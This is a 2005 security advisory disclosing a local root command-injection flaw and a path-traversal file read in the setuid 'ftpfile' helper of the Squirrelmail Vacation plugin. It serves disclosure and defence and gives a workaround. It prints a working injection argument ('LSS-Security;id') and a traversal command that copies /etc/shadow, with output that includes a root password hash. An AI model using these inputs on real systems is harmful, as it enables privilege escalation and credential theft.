Squirrelmail vacation v0.15 local root exploit
LSS Security Advisory #LSS-2005-01-03
http://security.lss.hr
---
Title : Squirrelmail vacation v0.15 local root exploit
Advisory ID : LSS-2005-01-03
Date : 10.01.2005.
Advisory URL :
http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-01-03
Impact : Privilege escalation and arbitrary file read
Risk level : High
Vulnerability type : Local
Vendors contacted : No response from vendor
---
===[ Overview
The Vacation plugin for Squirrelmail lets UNIX users set an auto-reply
message for incoming email, which is commonly used to notify the sender of
the recipient's absence. The plugin relies on the standard vacation program.
The plugin can be downloaded from:
http://www.squirrelmail.org/plugins/vacation0.15-1.43a.tar.gz
===[ Vulnerability
The Squirrelmail Vacation plugin ships a setuid-root program, 'ftpfile'.
The program is used to access local files in the user's home directory, and
it contains both a privilege escalation and an arbitrary file read vulnerability.
Command-line arguments are passed through to the command that ftpfile executes
(via execve()) without checking for shell meta-characters, so a ';' in an
argument chains an arbitrary command, which then runs as root:
[ljuranic@laptop ljuranic]$ id
uid=509(ljuranic) gid=513(ljuranic) groups=513(ljuranic)
[ljuranic@laptop ljuranic]$ ftpfile 0 root 0 get 0 "LSS-Security;id"
/bin/cp: omitting directory `/root/0'
uid=0(root) gid=513(ljuranic) groups=513(ljuranic)
[ljuranic@laptop ljuranic]$
It is also possible to read restricted files (such as /etc/shadow). ftpfile
copies a file named relative to the user's home directory to any other
location, but it never checks the file name for '..' path components, so a
directory traversal sequence makes it copy any file on the system as root:
$ ftpfile localhost root root get ../../../../etc/shadow ./shadow
./shadow
[ljuranic@laptop ljuranic]$ head ./shadow
root:$1$Pwqt1daJ$DIe.fhBadNTN6d1br1OGy0:12401:0:99999:7:::
bin:*:10929:0:99999:7:::
daemon:*:10929:0:99999:7:::
lp:*:10929:0:99999:7:::
[ljuranic@laptop ljuranic]$
===[ Affected versions
Squirrelmail Vacation v0.15 and previous versions.
===[ Fix
Not available yet. Until the vendor provides one, remove the setuid bit from
ftpfile (chmod u-s ftpfile) or remove the binary, so it can no longer be used
to run commands or read files as root.
===[ PoC Exploit
http://security.lss.hr/exploits/
===[ Credits
Credit for this vulnerability goes to Leon Juranic.
===[ LSS Security Contact
LSS Security Team, <eXposed by LSS>
WWW : http://security.lss.hr
E-mail : security@xxxxxx
Tel : +385 1 6129 775